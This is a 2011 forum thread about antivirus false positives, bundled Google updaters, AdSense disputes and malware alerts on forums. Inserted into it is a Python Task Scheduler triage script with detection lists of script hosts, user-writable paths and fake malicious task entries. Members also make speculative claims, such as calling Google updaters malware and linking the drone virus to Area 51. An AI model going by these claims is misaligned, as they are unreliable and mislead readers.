Pegasus Research Consortium

Breaking News => Breaking News => Topic started by: zorgon on October 08, 2011, 12:02:23 am

Title: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:02:23 am
Internet Wars and Java Attacks

Yesterday before I had to take the whole forum off line, I had started a thread on the hacking and other issues. It was titled;

Microsoft and Google tricks - are they at War? (http://lucianarchy.proboards.com/index.cgi?board=zorgon&action=display&thread=10863&page=1)

It was the only thread that got messed up in the reset (only 24 hours this time) but fortunately I had copied it to open minds as well... so I brought it back along with the additions made by a few members over there. Since this concerns everyone... it should be posted at both sites...

Now before I continue... there is something I STRONGLY ADVISE all who read this right now to CLEAN YOUR JAVA HISTORY... you will see why later. Trust me on this and then read on.

We found that it does not clean using CCleaner or other cleaners automatically, so you MUST do it manually.

To do this...

1. Control Panel
2. JAVA
3. Temporary Internet Files
4. Settings
5. UNCHECK box "Keep Temporary Internet Files on my Computer"
6. DELETE FILES
7. Delete the following temporary files?
8. check box Applications and Applets
9. check box TRACE and log file
10. hit OK

You will see why this is important in the thread info. You can wait till you read it but these are temporary internet files that you do not need.


OH and remember the term "FALSE POSITIVES"

Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:02:49 am
Oct 1, 2011, 10:54pm

Microsoft and Google tricks - are they at War?

Yesterday while using Firefox I had my computer shut itself down several times...WTF? Did all the virus, etc scans... then finally traced it to watching videos at youtube. Seems my protection programs that shut down when there is an unknown attack were triggered.

Then over the past few weeks several forums and websites have experienced odd problems. Open Minds was down for a day, yesterday I saw several messages from Proboards saying they were having unknown issues (brief but I got that screen three times). Then I saw ATS was also having issues. This is the main thread on the problem at ATS but there were several more. With the size of their membership base, they are more likely than anyone to find such problems.

What the heck is going on with ATS (http://www.abovetopsecret.com/forum/thread759012/pg1)

As was pointed out in that thread by the owner....

Quote
People should be aware that something really weird is happening with Microsoft Security Products today. Earlier in the day it was flagging the Chrome browser as a virus and deleting it. Other complaints have been around some FireFox plug-ins also being flagged.

Here is the link;

Microsoft Security Products Flag Google Chrome As a Virus

Quote
"Reports poured in this morning that Microsoft's security products, namely Microsoft Security Essentials and Forefront Client Security, were flagging Google Chrome as a virus (PWS:Win32/Zbot) and removing the browser if users chose to clean and reboot their machines. Users reported that the only way to mitigate the problem was to set MSE and Forefront to 'always allow' Zbot, which is generally considered to be a bad idea."

Quote
A Google employee in the above support thread notes that Microsoft has now pushed another update to resolve the issue. "On September 30th, 2011, an incorrect detection for PWS:Win32/Zbot was identified. On September 30th, 2011, Microsoft released an update that addresses the issue. Signature versions 1.113.672.0 and higher include this update."

Microsoft Security Products Flag Google Chrome As a Virus (http://tech.slashdot.org/story/11/09/30/176230/microsoft-security-products-flag-google-chrome-as-a-virus)

Are all these recent issues related? May be too soon and hard to tell, but SOMETHING is going on and it bears making people aware of it and a close watch.

Quote
Google does a lot of very shady things involving auto-updates and integrating with unnecessary parts of a system. Why does my Firefox installation need a Google Update plug-in I never asked for, and why does it keep getting reactivated even though I've explicitly turned it off?

The reaction might not have been deliberate on this occasion, but I am utterly lacking in sympathy if Google's shady code starts getting treated like malware. If it walks like a duck and quacks like a duck, it's still a duck, even though sometimes it can taste good.

Microsoft Security Products Flag Google Chrome As a Virus (http://tech.slashdot.org/story/11/09/30/176230/microsoft-security-products-flag-google-chrome-as-a-virus)

Quote
Chrome is a virus. You see, it has caused the marketing people at Mozilla to go crazy with the numbering scheme of FF and as a result, borked up my once good to use user interface into a complete mess of new design, misplaced buttons, screwy single menus and a whole host of unusable extensions. Chrome is a virus... that has killed Firefox.

Microsoft Security Products Flag Google Chrome As a Virus (http://tech.slashdot.org/story/11/09/30/176230/microsoft-security-products-flag-google-chrome-as-a-virus)

This is one point I am already familiar with, having just upgraded to Firefox 6.0.2 (and now already they are pushing 7.0). Buttons and features scattered around that I had to 'relearn' them once I found them. I was wondering why they would make such a drastic revision... seems we now have the answer

Google AdSense
the Good, the Bad, and the Downright Ugly


Several other forums have gone the route of adding direct connections to Twitter, Facebook and Google +1. Seems to me that since that has been done, all that happens is a flood of people that really add nothing to the quality of the forum posts, and mainly seem oriented to getting numbers.

Personally I think this number crunching, while it may be good to generate revenue, just swamps a forum with trolls and other distractions. As such we will NOT add such connections here and there will be a note to that effect in the Rules and Structure section for review.

Now about AdSense

Google currently offers webmasters a payment of $75.00 to sign up for the program. Once you do you start generating income based on people clicking on AdWords and other links...

I STRONGLY suggest reading the following information that I have taken some basic clips from. I have also written to the author to ask permission to repost this article.

Quote
AdSense: what is it?

AdWords is the system that produces the advertisements in Google's search results pages. The ads are contextual and match what is on each results page, and an advertiser doesn't pay anything unless a surfer clicks on the ad. AdWords became very popular with advertisers, and Google started to make money.

Then Google took AdWords a stage further, by allowing the ads to be displayed on other people's websites. This is AdSense. When the AdWords ads are displayed on other people's websites, such as this one, it is called AdSense. When visitors to the site click on an AdSense ad, the site owner is paid a large percentage of what the advertiser pays to Google for the click.

Google AdSense - by Phil Craven - Web Workshop (http://www.webworkshop.net/google-adsense-the-good-the-bad-and-the-ugly.html)

Quote
AdSense: the Good

AdSense allows website owners to earn money from their sites in a way that they couldn't do before. All they have to do is put the AdSense code in their pages, and some visitors to the site will click on the ads that are displayed.

Quote
Here endeth the "Good" side of AdSense. Google's creation is excellent, but in launching it, they inadvertently created something of a monster that just keeps growing.

Some people soon realised that they could capitalise on AdSense in ways that would be detrimental to the Web, to Web users, and to search engines, including Google itself. A new off-white, and sometimes positively black, industry was born.

Google AdSense - by Phil Craven - Web Workshop (http://www.webworkshop.net/google-adsense-the-good-the-bad-and-the-ugly.html)

Quote
AdSense: the Bad

Shortly after AdSense appeared, MFA sites started to appear. These are sites that are created for the sole purpose of making money from AdSense. Some of them contain genuine information and are useful, but most of them contain nothing of real value to Web users. The non-useful ones usually contain nothing but links to other sites - the links themselves being more AdSense ads - although some of them contain some real content that has been stolen from other websites. They are parasite websites that help nobody but their owners.

Google AdSense - by Phil Craven - Web Workshop (http://www.webworkshop.net/google-adsense-the-good-the-bad-and-the-ugly.html)

Quote
AdSense: the Downright Ugly - AdSense scams

The MFA sites spoil the Web, but they don't scam people. They merely take advantage of AdSense. But there are also scammers who are taking advantage of AdSense, by selling something that they know can't succeed. If it could succeed, they wouldn't be offering it to other people - they would be raking in the millions themselves. This AdSense Scams article describes them fully, so I'll just provide a brief summary.

There is a LOT more valuable info in the original article. PLEASE take the time to read it to avoid the scams

Related Links:

1. AdSense Ready WebSites Scams - why NOT to buy AdSense Ready Websites (http://www.webworkshop.net/adsense-ready-websites-scams.html)
2. Google AdSense Scam: Is there Truth to the Google AdSense Scam? (http://www.googleadsensescam.com/)
3. Google Adsense Scam - No Support / Explanation From Google Adsense (http://www.google.com/support/forum/p/AdSense/thread?tid=2ee2d3252cd81e68&hl=en) - Google Forums
4. Google AdSense - by Phil Craven - Web Workshop (http://www.webworkshop.net/google-adsense-the-good-the-bad-and-the-ugly.html)


This direct from Google Forums...

Quote
Appealing Google Adsense is waste of time and words, i would rather like to highlight to all publishers whose account were never disabled; BEWARE OF USING CLICK OPTIMIZER techniques.

I had sports news site that fetched more than 35000 visits on a day of important game and next day my site got banned. Why? No reason was provided. If site content was so spammy, Google News team never would have taken. This was excellent piece of content. I used "One Click Optimizer" technique published by Google Adsense : http://www.google.com/support/adsense/bin/static.py?page=guide.cs&guide=29872&topic=29875&answer=187666

Due to this I got 10000 clicks. And I got punished. I had only 3 units, no hidden keywords, no backdoor pages ... no fraud/invalid click. Still I have not received any reply from Google Adsense team. Only standard reply; our team believed it and we did it.

Later after a month; I got my account disabled and Google Adsense team blocked my more than 2000 USD. I keep asking Google Adsense team how do you believe that I have violated your policies but no reply.

I read a lot of articles on it and always be careful about Adsense team; but yet I am in their trap. I do not know if they really repay to advertisers; or really care for them.. if they care for advertiser; why should they publish article to train publisher to misbehave with advertisers... read their text carefully:

Place a 300x250 medium rectangle embedded into the content for placement targeting and better integration.

Put a 728x90 leaderboard or a 468x60 banner below the article to attract the users attention when they finish reading. ( to attract the users attention...... this publisher should cheat readers to attract attention by placing ad below content. )

Place a 160x600 wide skyscraper below the side navigation bar.
Add two 468x15 link units below the title, and between the article and the leaderboard (728x90) or banner (468x60). ( This is what most punishing... If you put below title; definitely you will mislead readers to click. There is another article that says; this is invalid. Ads shouldn't be placed under a title or section heading in a way that implies that the ads are not ads. Source : http://adsense.blogspot.com/2008/03/another-look-at-optimizations.html ( What is real Dear Google Adsense Team? ) )
Adding an Adsense for Search search box next to the top navigation bar would be an additional way to monetize your site. ( to monetize your site ...see the word used. Your site purpose is not for readers, better content but to monetize. Google Adsense team is teaching to monetize site by such techniques and later they disable account. )
My only question is: if I do not send fraud click / invalid clicks by any automation; I do not use more than 3 units in same page; My article is not full of keywords - Why should I get punishment and loss 2000 USD? And why their team is not answering me that because of so & so reason in details; we are disabling your account.

They talk of "Valid Clicks" - they have extra ordinary software to track invalid clicks; they should repay me all money for valid clicks. And I am 100% sure on basis of my experience that I have all valid clicks. But Google never warn or teach to publisher.

Fact is their internal content are conflicting. As I said :

http://adsense.blogspot.com/2008/03/another-look-at-optimizations.html

Vs

http://www.google.com/support/adsense/bin/static.py?page=guide.cs&guide=29872&topic=29875&answer=187666

Are in Conflict. Then who will punish Google Adsense team?  Small publishers are not big companies to file a case against them. Even this forum is not helping me. I sent 10 emails to Adsense team; but no reply, no help.

Google Adsense Team is self court and jury; they do not give reasons for disabling account. Just one line - "as our team found; we disable account and not paying you money." But give us chance to put our words in reply. At least one chance to correct ourselves?

Train us, Teach us. In last 5 years; Google Adsense team never warned me or trained me.

Hope you are now aware of Google Adsense Team Scam!!

Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:04:56 am
author=burntheships  Oct 1, 2011, 10:58pm

I have noticed some very unusual things lately on my desktop,
laptop went out so....

Microsoft was blocking certain websites deeming them unsafe.

And what was the offending website? You Tube! At first I thought I
just had not paid attention to what I was doing...but...then once
I realized it did it again...whoa!

It was not my virus protection software, it was MS!

I have firefox on there also, did not try it, just was using an IE window
that was already open.

I don't even remember what I was attempting to watch on You Tube,
it was that run of the mill.

author = ProtoplasmicTraveller
I got a hard drive failure imminent message a couple weeks ago and had to replace my PC as a result when I was entirely unable to boot it up. I suspect Microsoft Security Essentials played a part in it all, and haven't installed/activated it on my new PC as a result.

Science Fiction and thriller writers often like to regale us with fictional stories of a future world ruled and dominated by one corporation.

I wouldn't be surprised if that corporation is Google or a company like it. The Internet and the World Wide Web in many ways are in fact a net, and a web that do pretty much have all of us and our most sensitive and personal information ensnared and caught up in it.

In a world where information is power that is frankly a lot of power, and with Google's recent acquisition of Motorola Cellular and its Android operating system it really is poised to not just challenge Microsoft but eventually perhaps emerge as the world's most powerful and relevant corporation.

However as formidable as Google is, Baidu, its Chinese counterpart, is shaping up to be just as formidable and making many of the same moves Google is in the West in the East.

Companies like Google surely warrant watching because they are surely watching all of us.

AH!!! Microsoft Security Essentials came up several times on my Zone Alarm and I denied permission  I may have hit okay once or so that caused the shut down.

author=olddood Oct 2, 2011, 3:45am

Hmmm..I need to chat with my Forensic Computer Buddy about this stuff.
See what he knows.
He is quite brilliant about such things but, first to admit he does not know all...

@Zorgon...
What version of MS was this?  Win7? XP? Vista?  All?

I still use XP because I have been too lazy to reformat and install Win7...

author=tiderious Oct 2, 2011, 3:54am
Those guys are reaching farther and farther, to dig more and more information out of your computer. We are getting so used to updates, and little tweaks that we hardly pay any attention, and that is probably what they want.
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:05:17 am
author=calikid Oct 2, 2011, 7:49am
I recently had the misfortune of having drive by malware install itself onto one of my systems (Win7-64bit/IE9).
While "weeding it out", I found the malware had loaded triggers  into my "Task Scheduler" in an attempt to reinstall itself if removed.

Funny thing was, while in Task Scheduler dealing with the malware, I found multiple "GOOGLE" entries right at the top of the Scheduler list. 
Probably unrelated but still weird since I don't even use Chrome.
Not sure WHY Google was there, or what programs it was running, but I deleted them anyway.
Along with the malware...

author = olddood Oct 2, 2011
Speaking of Malware my forensic buddy was telling me about this newer version of Malware.
It writes itself to the BIOS chip on a computer.
Talk about hard to get rid of.  ::)
You literally have to re-install your BIOS firmware I suppose to get rid of it.

I can't remember all the nerd jargon he was telling me but, it sounds nasty...
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:05:59 am
author=garuda Oct 2, 2011, 10:32am

Microsoft has its own, free, antivirus software, called 'Security Essentials'.

That's the one that removed Google Chrome 'by accident' because of a 'mistake' in the virus definitions. An updated database of virus definitions was released shortly afterwards... but in the mean time that damage had been done to loads of people.
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:07:35 am
author=calikid  Oct 2, 2011, 10:33am
Funny thing was, while in Task Scheduler dealing with the malware, I found multiple "GOOGLE" entries right at the top of the Scheduler list. 
Probably unrelated but still weird since I don't even use Chrome.
Not sure WHY Google was there, or what programs it was running, but I deleted them anyway.
Along with the malware...

Well now THAT is timely info.... because THIS occurred yesterday...

Quote
Okay more weirdness
I don't know if anyone else noticed this yet...

Adobe Flash plugin for Firefox required an update... so I downloaded it and ran it.

Without giving an option, Adobe software installed Google Chrome before it installed the new flash plugin on Firefox.

Google Chrome then at the same time added the Google Updater plugin back into Firefox  :o

I went to mozillaZine as it came up in a search on that plugin and on that page they have an ad for Google Chrome on a mozilla forum (at least that comes up for me)

http://forums.mozillazine.org/viewtopic.php?f=7&t=841905

Not much help there... the last post
"Actually you can get rid of it, the Google updater for Chrome, Earth and other Google stuff is always running (Processes), don't have a clue why they see fit to mess with FF."

and then the thread was closed.

So now I have to uninstall Chrome and the Google updater plugin... just because I needed the Adobe flash update. WTF is going on here? Anyone?

I tried to screen capture the screens, but after the install capture is not working (may just need a reboot) but I denied access for Chrome  which generated this message

This webpage is not available
The server at www.google.com can't be found, because the DNS lookup failed. DNS is the web service that translates a website's name to its Internet address. This error is most often caused by having no connection to the Internet or a misconfigured network. It can also be caused by an unresponsive DNS server or a firewall preventing Google Chrome from accessing the network.
Here are some suggestions:
Reload this web page later.
Check your Internet connection. Reboot any routers, modems, or other network devices you may be using.
Check your DNS settings. Contact your network administrator if you're not sure what this means.
Try disabling network prediction by following these steps: Go to Wrench menu > Options > Under the Hood and deselect "Predict network actions to improve page load performance." If this does not resolve the issue, we recommend selecting this option again for improved performance.
Try adding Google Chrome as a permitted program in your firewall or antivirus software's settings. If it is already a permitted program, try deleting it from the list of permitted programs and adding it again.
If you use a proxy server, check your proxy settings or check with your network administrator to make sure the proxy server is working.
If you don't believe you should be using a proxy server, try the following steps: Go to Wrench menu > Options > Under the Hood > Change proxy settings > LAN Settings and deselect "Use a proxy server for your LAN."
Error 105 (net::ERR_NAME_NOT_RESOLVED): Unable to resolve the server's DNS address.

:P

Okay so a reboot still no screen capture. It somehow disabled my hot keys but I was able to use the delay timer

Here is the mozilla forum with the Google Chrome ad...

(http://www.thelivingmoon.com/forum/temp/google_002.png)

Then when I uninstalled Google Chrome, IE came up trying to connect... I refused then got this...

(http://www.thelivingmoon.com/forum/temp/google_001.png)

Clicking the box to stop programs from 'suggesting' was disabled...  :o

So now I will have to do a full search and HiJack This scan to see what else they messed with...

All because of a simple update to the Adobe Flash plugin for Firefox.

I have used Firefox since day one, even before when it was Netscape. In fact I still used Netscape Composer to make my website pages. I am not happy with this turn of events. I posted that on the mozilla forum; shall see what comes of that.

I sure hope they haven't been compromised... THAT would suck big time..

So just now Google Installer is trying to get access... I see I have more nasty bugs in here to exterminate.


After cleaning out everything I found that Google Installer kept asking for permission. Couldn't figure out where it was hidden...

So now I will look at task scheduler... thanks
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:08:05 am
author=garuda
That's the one that removed Google Chrome 'by accident' because of a 'mistake' in the virus definitions. An updated database of virus definitions was released shortly afterwards... but in the mean time that damage had been done to loads of people.

Well maybe Google could 'accidentally' remove IE... then I would be rid of that virus :D
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:08:45 am
Quote from: garuda
That's the one that removed Google Chrome 'by accident' because of a 'mistake' in the virus definitions. An updated database of virus definitions was released shortly afterwards... but in the mean time that damage had been done to loads of people.

Well maybe Google could 'accidentally' remove IE... then I would be rid of that virus :D
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:09:13 am
Bigfatfurrytexan

October 02, 2011, 08:07:08 AM

I know it is a "security risk", but I never updated my firefox to FF4.  I liked the version I had, it is modified to just perfect for my taste.  And I noticed that FF4 was a resource hog, eating up over 334,000kb of memory on my mom's laptop.  More recent versions are worse.

To be honest, except on this particular laptop, I tend towards Chrome.  It is lean and mean.  FF has become fat and bloated.  Of course, that may be an issue of worry, too.

I am to the point of not wanting to ever identify anything of myself to a computer that connects to the internet.  Data mining is insidious, and companies are allowed to plead ignorance in court and get away with it (or only get a light slap).

The Facebook thing recently happening is of a similar vein.  And I wonder what will really be done about it.  Guess it is lucky for them that they got that lobbying team put together finally.

Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:09:42 am
ellirium113

Okay more weirdness

I don't know if anyone else noticed this yet...

Adobe Flash plugin for Firefox required an update... so I downloaded it and ran it.

Any one else having issues yet?

Guys I have seen this happen to a buddy of mine. I found in this case it seemed some sort of malware got through his anti-spyware program & his Norton Antivirus. It also turned off the settings to update themselves and effectively killed any ability to search on the web through internet explorer. So long as he typed in a web address it worked but any searches never worked.

You can click the run box and type MSCONFIG (xp users) to manually shut down any offending program. I then installed Spybot S&D (IMO one of the best free anti spyware programs) after getting rid of his other one.

You can get spybot here:
http://www.safer-networking.org/en/spybotsd/index.html

I installed this then updated it. Once you update this one you must manually click the immunize button to apply the new updates. The nice thing about this one is it has a registry locker that will warn you if anything tries to F#&K with your registry.  :)

After doing this none of the settings reverted back and everything was able to update antivirus definitions again etc.

Unfortunately I did not get time to see if it cured his search engine problem.  :(

This might be helpful:

http://www.ehow.com/how_5842581_remove-google-redirect-virus.html


Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:10:26 am
author=calikid
Funny thing was, while in Task Scheduler dealing with the malware, I found multiple "GOOGLE" entries right at the top of the Scheduler list.

Yup sure enough...

(http://www.thelivingmoon.com/forum/temp/google_003.png)

author=garuda
@zorgon: if you have a script blocker (like NoScript) running in Firefox, then that one would have blocked out the script that allowed you to install the flash update without installing Chrome...

In other words: if no script blocker running in FF, Adobe would have given you the option to install without installing Chrome. With script blocker, it installs both. Which stinks...

(I've had to install the update on 2 different machines, one with Noscript running in FF, and one without, so I could see the difference).


author=olddood
Speaking of Malware my forensic buddy was telling me about this newer version of Malware.
It writes itself to the BIOS chip on a computer.
Talk about hard to get rid of.  ::)
You literally have to re-install your BIOS firmware I suppose to get rid of it.
I can't remember all the nerd jargon he was telling me but, it sounds nasty...

Well looking at those two Google Updates

Google Update Task Machine Core
Google Update Task Machine UA

I would say I have found your new version of malware  ??? :o
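
The Task Scheduler review discussed in these posts, as an added example that is not part of the original thread: it reads a verbose CSV export from `schtasks /query /fo csv /v` and flags tasks by where their program lives and how it is launched. The sample export, host name, user name and the two flagged task entries are constructed for illustration, and the path and launcher lists are assumptions to tune locally.

```python
import csv
import io
import ntpath

# Constructed sample of a verbose Task Scheduler export (subset of columns).
# schtasks repeats the header row for each task folder, so one repeat is included.
SAMPLE_EXPORT = r'''"HostName","TaskName","Status","Task To Run","Run As User"
"PC1","\GoogleUpdateTaskMachineCore","Ready","""C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"" /c","SYSTEM"
"PC1","\GoogleUpdateTaskMachineUA","Ready","""C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"" /ua /installsource scheduler","SYSTEM"
"PC1","\{3F2A-constructed}","Ready","C:\Users\demo\AppData\Roaming\upd\svch0st.exe -r","demo"
"HostName","TaskName","Status","Task To Run","Run As User"
"PC1","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","%windir%\system32\defrag.exe -c","SYSTEM"
"PC1","\Updater Check","Ready","cmd.exe /c start C:\Users\demo\AppData\Local\Temp\a.bat","demo"
'''

# Assumption: locations a standard user can write to, where installed
# software normally does not keep the binaries its tasks run.
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")

# Assumption: launchers that run whatever their arguments point to.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def split_action(action):
    """Split a 'Task To Run' value into (program, arguments).

    Quoted programs are taken up to the closing quote; unquoted ones up to
    the first space (an unquoted path containing spaces would be cut short).
    """
    action = action.strip()
    if action.startswith('"'):
        end = action.find('"', 1)
        if end != -1:
            return action[1:end], action[end + 1:].strip()
    program, _, args = action.partition(" ")
    return program, args.strip()


def triage(export_text):
    """Return one finding per task with the reasons it deserves a closer look."""
    findings = []
    for row in csv.DictReader(io.StringIO(export_text)):
        if row["TaskName"] == "TaskName":
            continue  # repeated header row from the next task folder
        program, args = split_action(row["Task To Run"])
        reasons = []
        if any(marker in program.lower() for marker in USER_WRITABLE):
            reasons.append("program in user-writable path")
        if ntpath.basename(program.lower()) in SCRIPT_HOSTS:
            reasons.append("launched through a script host")
            if any(marker in args.lower() for marker in USER_WRITABLE):
                reasons.append("script host argument in user-writable path")
        findings.append({
            "task": row["TaskName"],
            "program": program,
            "run_as": row["Run As User"],
            "reasons": reasons,
        })
    return findings


def flagged(findings):
    """Names of the tasks that collected at least one reason."""
    return [f["task"] for f in findings if f["reasons"]]


if __name__ == "__main__":
    for finding in triage(SAMPLE_EXPORT):
        status = "; ".join(finding["reasons"]) or "no flag from these checks"
        print(f'{finding["task"]:45} {finding["program"]}\n    -> {status}')
```

A task that collects no flag here is not thereby cleared; the next check is the file's digital signature and publisher in its Properties dialog before deciding whether to disable the task.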
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:11:02 am
author=calikid  Oct 2, 2011, 10:35pm
You are welcome.   ;)

I also found a couple of Google Services Automatic Loads.
(gupdate and gupdateem).
You may want to check your Services and decide if you actually WANT them running.
Sure would be nice if they would ASK before installing and running services on our systems!

Quote from: calikid
I also found a couple of Google Services Automatic Loads.
(gupdate and gupdateem).

Nope don't got those and it's been quiet since I disabled those other two

Quote
Sure would be nice if they would ASK before installing and running services on our systems!

What we need is a lawyer who wants to make a name to take them to court on hacking charges. If we attempted to upload poop to their comps or the gov we would be on our way to Gitmo

Kinda like this...


Facebook sued over claims it tracks users' activity after they log off
October 02, 2011


Quote
FACEBOOK is being sued by a group of users over claims it tracks their online activity after they log off.

The claims were exposed by an Australian technology blogger, Nik Cubrilovic, who conducted tests that revealed that when users log out, the site does not delete tracking ''cookies'' but modifies them, keeping information that can identify users as they surf the internet.

The company has told users cookie files installed on their computers to track interactions with Facebook applications and websites are removed when they log off, according to a complaint in the US federal court in San Jose, California. Facebook admitted last week that the cookies track internet activity after users log off, according to the suit.

''This admission came only after an Australian technology blogger exposed Facebook's practice of monitoring members who have logged out, although he brought the problems to the defendant's attention a year ago,'' the complaint states.

Facebook sued over claims it tracks users' activity  (http://m.smh.com.au/technology/technology-news/facebook-sued-over-claims-it-tracks-users-activity-20111001-1l2qv.html)

But then... we always knew that right?

 ::)

author=garuda
In other words: if no script blocker running in FF, Adobe would have given you the option to install without installing Chrome.

Oops, too late, I already wrote Adobe a nasty letter   :-[

Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:11:20 am
author=nightmaredavid Oct 3, 2011, 1:03am
It wasn't just a Microsoft issue. Google pushed out a Chrome update because Chrome did have code that was triggering the false positive. So technically, it wasn't a 100% percent false detection by Microsoft Security Essentials.

LOL @ the IE being a virus comment. You have to admit it's a lot better than it used to be though.

Wait until IE 10 and Windows 8 come out. Anything that tries to run gets stopped by SmartScreen which will be system-wide instead of just an IE feature. Any Windows user here should download the Windows 8 Developer Preview from Microsoft and try it out. They're finally going into the right direction with Windows 8.

As for Facebook, I'll never touch that site again. Had one account only because I got tired of family and friends asking why I didn't have one then eventually got rid of it. Made another one and just got sick of seeing all the teenage drama that goes on between adults on that site. Not to mention that there's nothing secure at all about the place. Even Zuckerberg himself once admitted in an interview that he's gone into the accounts of random members and gone through their personal stuff. The kid has zero respect for privacy.
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:11:44 am
The following are two PM's to forum admin. I will leave out the name and which forum, but the message needs to be added here

Oct 6, 2011

Author = Zorgon...
Have you been getting any reports from members that they are getting alerts, a virus warning or redirect?


We have had several reports like that. One of the problems was that the Google analytic package we tried had one piece of iffy software that someone could use in a bad way. That set off a few alarm bells and we got rid of it immediately.

Second, someone was messing with us, possibly adding tracking types of malware which, while not really doing any damage, does set off some people's antivirus. Unfortunately, any forum that gets to any size or influence becomes a target for this sort of thing...or much worse.

We have to be on the lookout for this stuff all the time. The worst of it is that we are always in reactive mode because there are not enough proactive defense measures. The better news is that the worst things they could do are fixable if massively inconvenient. Unfortunately, the little annoying things they do undermine member confidence, especially if they succeed in getting the members to think that it is the forum administration that is messing with them or spying on them in some way, as recently happened.

Key point here is USERS thinking the issue is COMING FROM THE FORUM

The reality is usually the scripts are on the person's hard drive via their browser... We ran a full scan of every ad coming to the site when this was happening and found one that was screwing with content, we removed it from the rotation and all was well.

I don't know if it was this one or not, we had several issues all happening at once and only one of them was actually coming from an ad on our site.

The rest were a nasty little bit of malware that made the rounds from who knows where. Lots of people acquired it which made it look as though it was originating from our (and many other) site when it really wasn't. Happens lots.

Okay again the same point..
Users thinking it's the forum that is sending the alerts... like virus warnings, false positives and redirects. The forum says it's in the user's browser.

Hold that thought....
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:12:15 am
Okay so now the start of attacks on my forum

Oct 6, 2011, 2:35am

author=nightmaredavid
LOL @ the IE being a virus comment. You have to admit it's a lot better than it used to be though.

I will admit no such thing... I deleted it :P

It wasn't just a Microsoft issue. Google pushed out a Chrome update because Chrome did have code that was triggering the false positive. So technically, it wasn't a 100 percent false detection by Microsoft Security Essentials.

Well, something is still going on. ATS is getting virus alerts and we are getting false application alerts and redirects all day.

(http://www.caesonline.com/wp-content/uploads/2011/08/Dobermann_Fotos_6.jpg)  RUSSO

I got this message today here in PRC, and also got the message a few times in ATS some days ago.

"My anti-virus (Avast) reported malware when I opened a thread"

http://www.abovetopsecret.com/forum/thread760537/pg (http://www.abovetopsecret.com/forum/thread760537/pg)

(http://files.abovetopsecret.com/files/img/qt4e8bfab5.png)

By ZeroReady

I'm guessing this is just a false positive, but Avast has never reported malware on ATS before. I've been using it for a long time, and I've never seen this. What gives? Anyone else using Avast Anti-virus ever get this on ATS?

Response by TheLoneArcher

Funny you should say that. Our corporate virus detector here in the office did exactly that last week, three times in fact. As ours is installed as a part of a military defence contract, it could be over sensitive. However, three times in succession is a bit high.

If the MODs can throw any light on the matter?

BTS report:

(http://www.thelivingmoon.com/forum/temp/Burntheships_Attack.jpg)

Ellirium's report:

Quote
yes...I had the browser off completely making a coffee...came back and clicked my favorites link to here and instantly I got a notification from Norton about intrusion attempt. Yes I am using IE8 on XP-PRO.

Quote
I browsed around other sites and came back, shut off the browser and came back...can't make it repeat the problem...Norton might just be automatically blocking it now.

Quote
yeah I can get on no problem.

(http://www.thelivingmoon.com/forum/temp/Attack_Eliirium.png)
Quote
98.126.133.139

ATS war thread:

What the heck is going on with ATS?

http://www.abovetopsecret.com/forum/thread759012/pg1#pid12460196


(http://www.thelivingmoon.com/forum/banners/Somamech.jpg)  Somamech

Quote
have you seen an alert message when logging in?

Yeah I get it every time I click a new link.  Just started happening today for me  ???

screen grab  (miss the snipping tool in win 7..still on xp here at work)

(http://www.thelivingmoon.com/forum/temp/Alert_Somamech_02.png)

As for Facebook, I'll never touch that site again. Had one account only because I got tired of family and friends asking why I didn't have one then eventually got rid of it. Made another one and just got sick of seeing all the teenage drama that goes on between adults on that site. Not to mention that there's nothing secure at all about the place. Even Zuckerberg himself once admitted in an interview that he's gone into the accounts of random members and gone through their personal stuff. The kid has zero respect for privacy.

Early on he was quoted as saying (regarding students who first signed up to use his early version of Facebook), "They are stupid enough to give me their personal information."
Title: Re: Internet Wars and Java Attacks
Post by: zorgon on October 08, 2011, 12:12:35 am
Computer Virus Hits U.S. Drone Fleet

(http://www.wired.com/images_blogs/dangerroom/2011/10/Predator-cockpit_s.jpg)

Quote
A computer virus has infected the cockpits of America’s Predator and Reaper drones, logging pilots’ every keystroke as they remotely fly missions over Afghanistan and other warzones.

The virus, first detected nearly two weeks ago by the military’s Host-Based Security System, has not prevented pilots at Creech Air Force Base in Nevada from flying their missions overseas. Nor have there been any confirmed incidents of classified information being lost or sent to an outside source. But the virus has resisted multiple efforts to remove it from Creech’s computers, network security specialists say. And the infection underscores the ongoing security risks in what has become the U.S. military’s most important weapons system.

“We keep wiping it off, and it keeps coming back,” says a source familiar with the network infection, one of three that told Danger Room about the virus. “We think it’s benign. But we just don’t know.”

http://www.wired.com/dangerroom/2011/10/virus-hits-drone-fleet/

 :o

So hackers are getting into Area 51's Swarm Control at Creech

THIS is a scary statement..

“We keep wiping it off, and it keeps coming back,” says a source familiar with the network infection, one of three that told Danger Room about the virus. “We think it’s benign. But we just don’t know.”

So the forums are all getting hit heavy with no one really knowing WHERE it's coming from. And now today we get a report that the Military, at one of the most secret installations on the planet, with all the billions spent on equipment... have this as an answer

“We think it’s benign. But we just don’t know.”

 :o

Are you scared yet?

Remember last year?

Now remember last year?

October 26, 2010

Communication With 50 Nuke Missiles Dropped in ICBM Snafu

(http://www.wired.com/images_blogs/dangerroom/2010/04/keyturn-660x438.jpg)

Quote
